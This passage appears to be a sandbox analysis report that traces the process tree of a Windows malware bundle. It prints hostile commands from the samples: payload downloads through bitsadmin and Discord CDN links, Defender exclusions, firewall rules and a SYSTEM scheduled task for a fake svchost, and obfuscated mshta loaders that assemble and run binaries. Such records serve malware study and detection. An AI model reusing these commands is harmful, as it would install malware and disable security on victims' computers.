C:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exeC:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 25210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVs6mDmdY1wodMZO -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKWTDtkOpwTbA5mS -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS10⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS11⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵
-
C:\Users\Admin\Pictures\Adobe Films\KhfMcFjZeLr5yaBalfDo9zyX.exe"C:\Users\Admin\Pictures\Adobe Films\KhfMcFjZeLr5yaBalfDo9zyX.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dEq6aoQFJyDc30_OysF9fzTL.exe"C:\Users\Admin\Pictures\Adobe Films\dEq6aoQFJyDc30_OysF9fzTL.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\AkBj2Qb1oMtZ1Gs927Ft3ji8.exe"C:\Users\Admin\Pictures\Adobe Films\AkBj2Qb1oMtZ1Gs927Ft3ji8.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe"C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\oRqxkgsixdTQLGlCw_wScXlE.exe"C:\Users\Admin\Pictures\Adobe Films\oRqxkgsixdTQLGlCw_wScXlE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\iWl5YE6jVqxWhmGtApNhDm2L.exe"C:\Users\Admin\Pictures\Adobe Films\iWl5YE6jVqxWhmGtApNhDm2L.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 2603⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\KzQ4K19_9XrJ2mdTwpnysCw4.exe"C:\Users\Admin\Pictures\Adobe Films\KzQ4K19_9XrJ2mdTwpnysCw4.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe"C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\5A2E.bat "C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe""3⤵
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32034\18.exe18.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32034\Transmissibility.exeTransmissibility.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0MCyp39H8AxiYTlGcyBfNoUC.exe"C:\Users\Admin\Pictures\Adobe Films\0MCyp39H8AxiYTlGcyBfNoUC.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 2483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Vo5pWC9v4LM4GIuQjsgwgSyb.exe"C:\Users\Admin\Pictures\Adobe Films\Vo5pWC9v4LM4GIuQjsgwgSyb.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 2523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe"C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 17843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe"C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe"C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Lmzy936RB1QfVboFo4pd1_Pn.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-37ELN.tmp\Ws4KoXUYMhJwpZIH_OOJR6K8.tmp"C:\Users\Admin\AppData\Local\Temp\is-37ELN.tmp\Ws4KoXUYMhJwpZIH_OOJR6K8.tmp" /SL5="$10278,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-35PMH.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-35PMH.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare.exe"C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\cf-dc3df-d88-e8682-9dc82a66a28f0\Vytygydula.exe"C:\Users\Admin\AppData\Local\Temp\cf-dc3df-d88-e8682-9dc82a66a28f0\Vytygydula.exe"5⤵
- Modifies system certificate store
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e66⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:37⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2304 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6092 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:87⤵
-
